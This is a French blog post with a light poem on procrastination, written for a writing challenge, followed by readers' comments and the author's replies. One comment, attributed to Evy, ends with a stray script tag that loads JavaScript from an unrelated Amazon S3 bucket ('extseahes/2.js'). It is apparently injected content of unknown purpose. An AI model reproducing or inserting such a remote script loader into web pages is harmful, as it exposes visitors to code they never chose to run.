• Procrastination...

     Procrastination...

    Pour Plume de Poète chez Evy

    Thème du défi écriture : « Prenons le temps »

    Et ou avec 10 mots en imposé

    « Musée, monde, étudie, coins, installe

    paisible, reportage, perdue, traversé, immensité. »

     

     

    Procrastination...

     

     

    Procrastination...

    Ou l'art du report

    Du report

    Du report

    Même sa mort,

    Paresse... Mais que non !

    Juste un rituel malin,

    A tout ajourner, avec complaisance,

    L'homme s'installe avec aisance

    Dans les lendemains !

     

    Paisible présent au bercail

    Nullement traversé de labeur...

    En tous coins

    Abomination

    Il traîne du travail

    Ses façons font horreur

    A ses semblables, témoins

    De sa procrastination...

     

    Un monde d'ajournement absolu

    Où toute chose perdue

    S'installe ça et là en une immensité

    Fossiles des hier, à remplir un musée... !

     

     Le procrastinateur

    Cet homme qui étudie le « reportage »

    En grand professionnel

    Le procrastinateur

    A ne pas confondre avec fainéantissage

    Ce péché plus que véniel...

     

     

    jill bill  yes

     

    Procrastination...

     

     

     

    Partager via Gmail Yahoo! Google Bookmarks Blogmarks

  • Commentaires

    41
    Vendredi 25 Octobre 2019 à 11:50

    Bravo, Jill, qui sait se mettre à la place du procrastineur mais je ne te vois pas du tout comme ça smile ! Bizzz.

    40
    Jeudi 24 Octobre 2019 à 19:48
    J ai aimé aussi ,le feneantissage, un état qui parfois fait du bien à essayer

    Bonne soirée jill
      • Jeudi 24 Octobre 2019 à 21:01

        yes quand il y a un trop de travail, de fatigue, hop..... bises

    39
    Jeudi 24 Octobre 2019 à 17:46

    bonsoir

    je n 'utilise pas ce mot bravo

    soleil en bretagne poutou du soir étoilée

      • Jeudi 24 Octobre 2019 à 18:22

        Bonsoir... Oh moi non plus... je reste avec l'ancien, paresser... Ici un ciel bas, couvert... bises, JB

    38
    Jeudi 24 Octobre 2019 à 16:24
    PPRené

    bonjour chere Jill, j'ignorais ce nom, mais je le pratiquais sans le savoir !! c'est tellement bien de remettre au lendemain, au surlendemain, au ... pas serieux s'abstenir ! bonne soiree chere amie, bises 

      • Jeudi 24 Octobre 2019 à 18:20

        Bonsoir René, ah arrivé à un âge plus qu'honorable, tant pis pour le non fait, il attendra, ce n'est pas pécher.... mais de même, bises

    37
    Evy
    Jeudi 24 Octobre 2019 à 13:33

    Bonjour Jill voilà un mot que je sais pas trop merci pour cette découverte et ta belle participation passe une bonne journée c'est en ligne bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
      • Jeudi 24 Octobre 2019 à 16:14

        Bonjour Evy, il n'est pas si vieux que cela... wink2 merci belle fin de journée, bises

    36
    Jeudi 24 Octobre 2019 à 12:13

    Je ne procrastine que par manque de temps!  c'est grave docteur?

    Bisous

      • Jeudi 24 Octobre 2019 à 16:13

        Je préfère manquer de temps que d'argent ma bonne dame !!! Bises wink2

    35
    Jeudi 24 Octobre 2019 à 12:10

    Je n'ai appris ce mot que très tardivement... mais je suppose que je connaissais déjà la chose. :))

    Bises et douce journée jill.

      • Jeudi 24 Octobre 2019 à 16:10

        Oh moi aussi Quichottine... comme obsolescence programmée !  wink2 Bon qui ne procrastine pas un poil.... !!! Bises de jill

    34
    Jeudi 24 Octobre 2019 à 11:47

    Tu as fait un portrait fidèle du procrastinateur , comme dit Eglantine  pas moyen de succomber à la procrastination , même constatation personne ne fait les choses à ma place non plus .

    Bonne journée 

    Bises 

      • Jeudi 24 Octobre 2019 à 12:10

        Ben voilà Jazzy, si on laisse passer qui le fera à notre place... (le saint Esprit.... sarcastic) nous en modèles ménagères même retraitées !!! De même, bises

    33
    Jeudi 24 Octobre 2019 à 11:38

    Je suis peut-être vieux jeu, mais pour moi la procréation c'est autre chose. La vie ne vient nullement des êtres humains qu'ils soient un ou deux, deux femmes ou deux hommes. C'est là le drame des lois en cours.

      • Jeudi 24 Octobre 2019 à 12:08

        Euh ??? ici on parle de "procrastination", paresse majuscule et non de procréation...

    32
    Jeudi 24 Octobre 2019 à 11:12

    CLIC   pour toi, Jill, bonne journée

      • Jeudi 24 Octobre 2019 à 11:24

        Oh que oui, Fernand Sardou pratiquait bien avant ce mot.... wink2

    31
    Jeudi 24 Octobre 2019 à 10:50

    J'en connais quelques-uns qui sont pourtant charmants, juste un peu agaçants...

      • Jeudi 24 Octobre 2019 à 11:24

        Ah ma foi, cela ne veut pas dire mauvais garçons... yes

    30
    Jeudi 24 Octobre 2019 à 10:06
    Josette

    Profitons de tous les petits instants plein de bonheur ... tant qu'ils sont là et pour l'agitation basta !

    gros bisous Fabienne

      • Jeudi 24 Octobre 2019 à 10:47

        Arrivé à un âge certain, comme celui de la retraite, ben oui Josette, bises

    29
    Jeudi 24 Octobre 2019 à 10:00

     

    Bonjour Jill

     

    J'ai beaucoup aimé (entre- autre) ton « fénéantissage » cool Voilà que tu te mets à parler comme Léonie ? smile

    A ce propos, merci d'être passées chez moi et d'avoir apprécié de dialogue plus que loufoque de ces "Deux commères" !

     

    Bises et belle fin de semaine

     

    Dominique

     

      • Jeudi 24 Octobre 2019 à 10:47

        Bonjour Dominique.... intello merci aussi, de même, bises

    28
    Jeudi 24 Octobre 2019 à 09:28

    Bonjour Fabienne. Ah oui : on peut s'agiter en tous sens et pourtant procrastiner... Bonne journée et bisous

      • Jeudi 24 Octobre 2019 à 09:31

        Hello Brigitte, faire du vent pour rien !! Bises et de même pour toi...

    27
    Jeudi 24 Octobre 2019 à 08:45

    Bonjour Jill 

    Un mot que je ne connaissais pas vraiment ..

    Merci à toi 

    Bises

      • Jeudi 24 Octobre 2019 à 08:50

        Hello Claudine,  faut dire qu'on utilise plus le mot paresse.... bises, jill

    26
    eglantine lilas
    Jeudi 24 Octobre 2019 à 08:32
    eglantine lilas

    happy  il y a bien des fois où j'aimerais reporter des choses...mais c'est curieux personne ne les fait à ma place !!! 

    belle journée à toi

    bisous

      • Jeudi 24 Octobre 2019 à 08:41

        Ben oui bonne-maman, c'est là le hic !!! On ne peut que compter sur soi... surtout côté corvées, bizzzzz

    25
    Mamazerty
    Jeudi 24 Octobre 2019 à 07:50
    Procrastinons parcimonieusement...
      • Jeudi 24 Octobre 2019 à 08:40

        Oui... sinon gare au retard accumulé en toutes choses...

    24
    Jeudi 24 Octobre 2019 à 07:12

    Bonjour Jill,

     

    J'ignorais que ça se nommer ainsi. Merci pour la découverte de ce mot

    Bisous

    yes

      • Jeudi 24 Octobre 2019 à 08:40

        Hello Martine, j'ai découvert ce mot il y a quelques années maintenant... merci, bises

    23
    Jeudi 24 Octobre 2019 à 04:25
    colettedc

    Comme c'est bon et si bien dit, Jill ! Mille bravos ! 

    Bon jeudi,

    Bises♥

      • Jeudi 24 Octobre 2019 à 08:39

        Merci soeur Colette, il y a prendre son temps et prendre son temps.... bises

    22
    Jeudi 24 Octobre 2019 à 01:26

    Excellentissime et en plus il y a Garfield!

    Mon chouchou chat wink2

    La procrastination, hélas, peut-être le signe d'une pathologie...

    J'ai des phases terribles de procrastination incontrôlée, impossible de faire quelque chose que je voudrais et devrais absolument faire,

    En neurologie, c'est un des signes associés à ma pathologie, je la combats mais c'est très dur...

    J'essaie de ne pas y penser trop intensément...

    Super l'humour noir de ton texte!

    Belle journée dame poétesse

    Gros bisous

    Cendrine

      • Jeudi 24 Octobre 2019 à 03:11

        wink2 à toute cause une bonne ou pas raison, surtout dans une maladie... on aimerait ne pas connaître, elle rend la vie pénible, et c'est pas l'pied !! Merci, de même à Paris, bises, JB

    21
    Jeudi 24 Octobre 2019 à 01:16
    Bonjour Jill
    oui ne jamais remettre
    Passe une très bonne journée
    Avec amitiés
    René
      • Jeudi 24 Octobre 2019 à 03:08

        Bonjour René... ben oui, après on cumule et ça déborde.... de même, jill

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :